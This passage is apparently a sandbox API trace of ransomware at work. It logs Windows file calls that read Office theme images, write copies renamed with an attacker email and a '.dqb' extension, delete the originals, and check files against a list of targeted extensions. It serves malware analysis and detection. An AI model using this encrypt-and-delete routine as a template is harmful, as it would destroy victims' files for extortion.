[0043.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.134] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=26402) returned 1 [0044.142] CloseHandle (hObject=0x1f8) returned 1 [0044.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 0x20 [0044.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.142] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.142] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.144] GetLastError () returned 0x0 [0044.144] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x6722, lpOverlapped=0x0) returned 1 [0044.156] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x6730, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x6730, lpOverlapped=0x0) returned 1 [0044.157] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.157] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.157] SetEndOfFile (hFile=0x20c) returned 1 [0044.157] CloseHandle (hObject=0x20c) returned 1 [0044.158] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.158] SetEndOfFile (hFile=0x1f8) returned 1 [0044.158] CloseHandle (hObject=0x1f8) returned 1 [0044.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.159] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\thmbnail.png")) returned 1 [0044.159] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.159] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.159] lstrlenW (lpString=".doc") returned 4 [0044.159] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.159] lstrlenW (lpString=".docx") returned 5 [0044.159] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.159] lstrlenW (lpString=".pdf") returned 4 [0044.159] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.159] lstrlenW (lpString=".xls") returned 4 [0044.159] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.159] lstrlenW (lpString=".xlsx") returned 5 [0044.159] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.159] lstrlenW (lpString=".ppt") returned 4 [0044.159] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.159] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.159] lstrlenW (lpString=".zip") returned 4 [0044.159] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.159] lstrlenW (lpString=".rar") returned 4 [0044.159] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.159] lstrlenW (lpString=".bz2") returned 4 [0044.159] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString=".7z") returned 3 [0044.160] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.160] lstrlenW (lpString=".dbf") returned 4 [0044.160] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.160] lstrlenW (lpString=".1cd") returned 4 [0044.160] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.160] lstrlenW (lpString=".jpg") returned 4 [0044.160] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.160] lstrlenW (lpString=".doc") returned 4 [0044.160] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString=".docx") returned 5 [0044.160] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.160] lstrlenW (lpString=".pdf") returned 4 [0044.160] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString=".xls") returned 4 [0044.160] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.160] lstrlenW (lpString=".xlsx") returned 5 [0044.160] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.160] lstrlenW (lpString=".ppt") returned 4 [0044.160] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.160] lstrlenW (lpString=".zip") returned 4 [0044.160] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.160] lstrlenW (lpString=".rar") returned 4 [0044.160] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.160] lstrlenW (lpString=".bz2") returned 4 [0044.160] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.160] lstrlenW (lpString=".7z") returned 3 [0044.160] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.160] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.161] lstrlenW (lpString=".dbf") returned 4 [0044.161] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.161] lstrlenW (lpString=".1cd") returned 4 [0044.161] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.161] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\THMBNAIL.PNG") returned 73 [0044.161] lstrlenW (lpString=".jpg") returned 4 [0044.161] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.161] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0044.161] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.161] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=1232) returned 1 [0044.161] CloseHandle (hObject=0x1f8) returned 1 [0044.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 0x20 [0044.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.161] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.162] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.162] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.162] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.163] GetLastError () returned 0x0 [0044.163] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x4d0, lpOverlapped=0x0) returned 1 [0044.165] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x4e0, lpOverlapped=0x0) returned 1 [0044.166] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.166] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.166] SetEndOfFile (hFile=0x20c) returned 1 [0044.166] CloseHandle (hObject=0x20c) returned 1 [0044.167] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.167] SetEndOfFile (hFile=0x1f8) returned 1 [0044.167] CloseHandle (hObject=0x1f8) returned 1 [0044.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.167] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 1 [0044.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.168] lstrlenW (lpString=".doc") returned 4 [0044.168] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.168] lstrlenW (lpString=".docx") returned 5 [0044.168] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.168] lstrlenW (lpString=".pdf") returned 4 [0044.168] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.168] lstrlenW (lpString=".xls") returned 4 [0044.168] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.168] lstrlenW (lpString=".xlsx") returned 5 [0044.168] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.168] lstrlenW (lpString=".ppt") returned 4 [0044.168] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.168] lstrlenW (lpString=".zip") returned 4 [0044.168] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.168] lstrlenW (lpString=".rar") returned 4 [0044.168] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.168] lstrlenW (lpString=".bz2") returned 4 [0044.168] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.168] lstrlenW (lpString=".7z") returned 3 [0044.168] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.168] lstrlenW (lpString=".dbf") returned 4 [0044.168] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.168] lstrlenW (lpString=".1cd") returned 4 [0044.168] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.168] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.168] lstrlenW (lpString=".jpg") returned 4 [0044.169] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.169] lstrlenW (lpString=".doc") returned 4 [0044.169] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.169] lstrlenW (lpString=".docx") returned 5 [0044.169] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.169] lstrlenW (lpString=".pdf") returned 4 [0044.169] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.169] lstrlenW (lpString=".xls") returned 4 [0044.169] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.169] lstrlenW (lpString=".xlsx") returned 5 [0044.169] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.169] lstrlenW (lpString=".ppt") returned 4 [0044.169] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.169] lstrlenW (lpString=".zip") returned 4 [0044.169] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.169] lstrlenW (lpString=".rar") returned 4 [0044.169] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.169] lstrlenW (lpString=".bz2") returned 4 [0044.169] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.169] lstrlenW (lpString=".7z") returned 3 [0044.169] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.169] lstrlenW (lpString=".dbf") returned 4 [0044.169] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.169] lstrlenW (lpString=".1cd") returned 4 [0044.169] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.169] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0044.169] lstrlenW (lpString=".jpg") returned 4 [0044.169] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.170] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0044.170] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.170] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2efff1c | out: lpFileSize=0x2efff1c*=18413) returned 1 [0044.170] CloseHandle (hObject=0x1f8) returned 1 [0044.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 0x20 [0044.170] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0044.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.170] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.170] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0044.171] GetLastError () returned 0x0 [0044.171] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x47ed, lpOverlapped=0x0) returned 1 [0044.173] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x47f0, lpOverlapped=0x0) returned 1 [0044.174] ReadFile (in: hFile=0x1f8, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0044.174] WriteFile (in: hFile=0x20c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.174] SetEndOfFile (hFile=0x20c) returned 1 [0044.174] CloseHandle (hObject=0x20c) returned 1 [0044.175] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0044.175] SetEndOfFile (hFile=0x1f8) returned 1 [0044.175] CloseHandle (hObject=0x1f8) returned 1 [0044.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0044.176] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1 [0044.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.176] lstrlenW (lpString=".doc") returned 4 [0044.176] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.176] lstrlenW (lpString=".docx") returned 5 [0044.176] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.176] lstrlenW (lpString=".pdf") returned 4 [0044.176] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.176] lstrlenW (lpString=".xls") returned 4 [0044.176] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.176] lstrlenW (lpString=".xlsx") returned 5 [0044.176] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.176] lstrlenW (lpString=".ppt") returned 4 [0044.176] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.176] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.176] lstrlenW (lpString=".zip") returned 4 [0044.176] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.176] lstrlenW (lpString=".rar") returned 4 [0044.176] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.176] lstrlenW (lpString=".bz2") returned 4 [0044.176] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.176] lstrlenW (lpString=".7z") returned 3 [0044.176] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString=".dbf") returned 4 [0044.177] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString=".1cd") returned 4 [0044.177] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString=".jpg") returned 4 [0044.177] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString=".doc") returned 4 [0044.177] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.177] lstrlenW (lpString=".docx") returned 5 [0044.177] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.177] lstrlenW (lpString=".pdf") returned 4 [0044.177] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.177] lstrlenW (lpString=".xls") returned 4 [0044.177] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.177] lstrlenW (lpString=".xlsx") returned 5 [0044.177] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.177] lstrlenW (lpString=".ppt") returned 4 [0044.177] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString=".zip") returned 4 [0044.177] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.177] lstrlenW (lpString=".rar") returned 4 [0044.177] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.177] lstrlenW (lpString=".bz2") returned 4 [0044.177] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.177] lstrlenW (lpString=".7z") returned 3 [0044.177] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.177] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.177] lstrlenW (lpString=".dbf") returned 4 [0044.177] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.178] lstrlenW (lpString=".1cd") returned 4 [0044.178] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0044.178] lstrlenW (lpString=".jpg") returned 4 [0044.178] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.178] lstrcmpiW (lpString1=".GIF", 